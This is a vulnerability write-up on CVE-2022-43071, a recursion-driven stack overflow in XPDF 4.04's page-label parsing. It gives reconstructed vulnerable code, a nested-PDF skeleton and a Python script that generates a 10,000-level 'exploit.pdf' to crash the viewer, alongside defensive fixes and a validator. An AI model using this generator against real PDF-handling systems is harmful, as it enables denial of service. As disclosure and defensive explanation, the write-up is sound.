CVE-2022-43071 - Stack Overflow in XPDF’s Catalog::readPageLabelTree2 – How a Single PDF Can Crash XPDF v4.04
XPDF is a popular open-source PDF viewer and toolset, often used on Linux and embedded systems. In November 2022, a vulnerability tracked as CVE-2022-43071 was published: a stack overflow in the Catalog::readPageLabelTree2(Object*) function of XPDF v4.04. Simply put, a specially crafted PDF file can crash the program, causing a Denial of Service (DoS). This post breaks down what happened, shows what the vulnerable code looks like, and explains how attackers can craft such malicious PDFs.
What’s Going On? The Vulnerability Explained
First, let's step back: a stack overflow happens when a program uses more stack space than it has been given, often through deep or infinite recursion. In this case, XPDF uses a recursive function to read page labels in PDFs. A PDF can be crafted so that this function calls itself thousands of times, exhausting the stack and crashing the viewer.
Vulnerable Code Snippet
// Simplified pseudo-reconstruction
int Catalog::readPageLabelTree2(Object* obj) {
    if (!obj->isDict()) return -1;
    Object kids = obj->dictLookup("Kids");
    if (kids.isArray()) {
        for (int i = 0; i < kids.arrayGetLength(); ++i) {
            Object kid = kids.arrayGet(i);
            // >>> Vulnerable recursive call
            readPageLabelTree2(&kid);
        }
    }
    // ... other label logic ...
    return 0;
}
There’s no check on recursion depth. If an attacker builds a PDF where the /Kids tree is very deep, this function will keep calling itself until there’s no more stack left.
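The failure mode is easy to reproduce in miniature. The sketch below is a Python model, not XPDF code: nested dictionaries stand in for label-tree nodes, and the hypothetical `walk_label_tree` mirrors the unbounded recursion shown above. Python protects its stack with a recursion limit and raises `RecursionError`; a C++ program has no such guard, so the equivalent walk simply crashes the process.

```python
import sys


def build_chain(depth):
    """Build `depth` nested nodes, each with one /Kids entry (hypothetical model)."""
    node = {}  # innermost leaf: no Kids
    for _ in range(depth):
        node = {"Kids": [node]}
    return node


def walk_label_tree(node):
    """Unbounded recursive walk, mirroring the vulnerable pattern.

    Returns the number of nodes visited.
    """
    count = 1
    for kid in node.get("Kids", []):
        count += walk_label_tree(kid)  # no depth check, just like the C++ code
    return count


def survives(depth):
    """Return True if the walk completes, False if the stack guard trips."""
    try:
        walk_label_tree(build_chain(depth))
        return True
    except RecursionError:
        return False


if __name__ == "__main__":
    limit = sys.getrecursionlimit()
    print("shallow tree survives:", survives(10))
    print("deep tree survives:", survives(limit + 100))
```

The only thing separating the two cases is nesting depth, which is entirely under the control of whoever wrote the file.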
How Can Attackers Exploit This?
All they need is a malicious PDF whose /Kids arrays keep nesting. Here's a cut-down, minimal example showing what the structure might look like:
%PDF-1.4
1 0 obj
<<
  /Type /Catalog
  /PageLabels 2 0 R
>>
endobj
2 0 obj
<<
  /Kids [3 0 R]
>>
endobj
3 0 obj
<<
  /Kids [4 0 R]
>>
endobj
4 0 obj
<<
  /Kids [ ... repeats ... ]
>>
endobj
In a real-world exploit, this can go thousands of levels deep, causing a stack overflow in XPDF when it tries to parse this PDF.
- This can trigger denial of service in automated systems (think: print servers or scanners).
- It could also be a stepping stone for more severe exploits, though the public disclosure describes only denial of service.
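Below is a Python snippet that generates a deeply nested PDF label tree like the one outlined above:
with open("exploit.pdf", "w") as f:
    f.write("%PDF-1.4\n")
    # Catalog whose /PageLabels entry points at the first tree node (object 2)
    f.write("1 0 obj\n<< /Type /Catalog /PageLabels 2 0 R >>\nendobj\n")
    n = 10000  # Recursion depth; adjust if needed
    # Objects 2..n+1: each node's only kid is the next object
    for i in range(2, n+2):
        f.write(f"{i} 0 obj\n<< /Kids [{i+1} 0 R] >>\nendobj\n")
    # Object n+2: empty leaf that ends the chain
    f.write(f"{n+2} 0 obj\n<< >>\nendobj\n")
    # No xref table is written, so the reader has to locate the objects itself
    f.write("trailer\n<< /Root 1 0 R >>\n%%EOF\n")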
More Resources and References
- XPDF Official
- CVE-2022-43071 at NVD
- OSS-Security Mailing List post
- GitHub Issue Reference _(Poppler is based on XPDF code)_
How to Fix
If you use XPDF anywhere, upgrade to the latest version. Check the upstream patches, or set up file validation to reject suspiciously nested PDFs.
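As a rough illustration of such file validation, here is a minimal Python sketch of a pre-filter. It rests on strong assumptions: objects are stored uncompressed as plain `N G obj ... endobj` text, and the label tree is reached through an indirect `/PageLabels` reference. Real PDFs often use object streams and compression, so a production filter would need a proper PDF parser. The function name `label_tree_is_safe` and the cap of 100 levels are hypothetical choices, not part of any XPDF tooling.

```python
import re

# Regexes for the simplified, uncompressed object syntax assumed above.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)
KIDS_RE = re.compile(rb"/Kids\s*\[(.*?)\]", re.DOTALL)
REF_RE = re.compile(rb"(\d+)\s+\d+\s+R\b")
LABELS_RE = re.compile(rb"/PageLabels\s+(\d+)\s+\d+\s+R\b")

MAX_DEPTH = 100  # assumed policy value, not taken from XPDF


def label_tree_is_safe(data, max_depth=MAX_DEPTH):
    """Return False if the /PageLabels tree is too deep or revisits a node."""
    objects = {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(data)}
    root = LABELS_RE.search(data)
    if root is None:
        return True  # no indirect page-label tree to inspect

    seen = set()
    stack = [(int(root.group(1)), 1)]  # explicit stack: no recursion here
    while stack:
        num, depth = stack.pop()
        if depth > max_depth or num in seen:
            return False  # too deep, or a cycle / shared node
        seen.add(num)
        kids = KIDS_RE.search(objects.get(num, b""))
        if kids:
            for ref in REF_RE.finditer(kids.group(1)):
                stack.append((int(ref.group(1)), depth + 1))
    return True


if __name__ == "__main__":
    sample = (
        b"%PDF-1.4\n"
        b"1 0 obj\n<< /Type /Catalog /PageLabels 2 0 R >>\nendobj\n"
        b"2 0 obj\n<< /Kids [3 0 R] >>\nendobj\n"
        b"3 0 obj\n<< >>\nendobj\n"
    )
    print("sample accepted:", label_tree_is_safe(sample))
```

The walk uses an explicit stack and a visited set, so the checker itself cannot be driven into deep recursion or an endless loop by the file it is inspecting.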
Alternatively, add a recursion depth limit to readPageLabelTree2, like so:
int readPageLabelTree2(Object* obj, int depth = 0) {
    if (depth > 100) return -1; // Prevent stack overflow
    // ... rest of the function ...
    readPageLabelTree2(&kid, depth + 1);
}
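To see the depth cap at work end to end, here is a small Python model of the same idea. It is a sketch, not XPDF code: nested dictionaries stand in for label-tree nodes, and `walk_label_tree`, `build_chain`, and `LabelTreeTooDeep` are hypothetical names. The cap of 100 matches the C++ sketch above and is an assumed policy value.

```python
MAX_DEPTH = 100  # assumed cap, matching the C++ sketch


class LabelTreeTooDeep(Exception):
    """Raised when the tree nests deeper than MAX_DEPTH."""


def walk_label_tree(node, depth=0):
    """Depth-limited recursive walk. Returns the number of nodes visited."""
    if depth > MAX_DEPTH:
        raise LabelTreeTooDeep(f"nesting exceeds {MAX_DEPTH} levels")
    count = 1
    for kid in node.get("Kids", []):
        count += walk_label_tree(kid, depth + 1)
    return count


def build_chain(depth):
    """Build `depth` nested nodes, each with a single /Kids entry."""
    node = {}  # innermost leaf: no Kids
    for _ in range(depth):
        node = {"Kids": [node]}
    return node


if __name__ == "__main__":
    print("nodes in a 5-level chain:", walk_label_tree(build_chain(5)))
    try:
        walk_label_tree(build_chain(10000))
    except LabelTreeTooDeep as err:
        print("rejected:", err)
```

A side benefit of the cap is that it also stops a node that lists itself among its own kids, since a cycle looks like unlimited depth to the walker.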
Summary
CVE-2022-43071 shows how a single deeply nested structure in a file can crash a long-established library. Whenever your software parses complex files from untrusted sources, put safety checks on recursion!
Stay safe: always keep your dependencies updated, and don't open PDFs from strangers with outdated software!
--  
*Exclusive write-up by ChatGPT, using public disclosures and code analysis for educational purposes.*
Timeline
Published on: 11/15/2022 17:15:00 UTC
Last modified on: 11/22/2022 13:44:00 UTC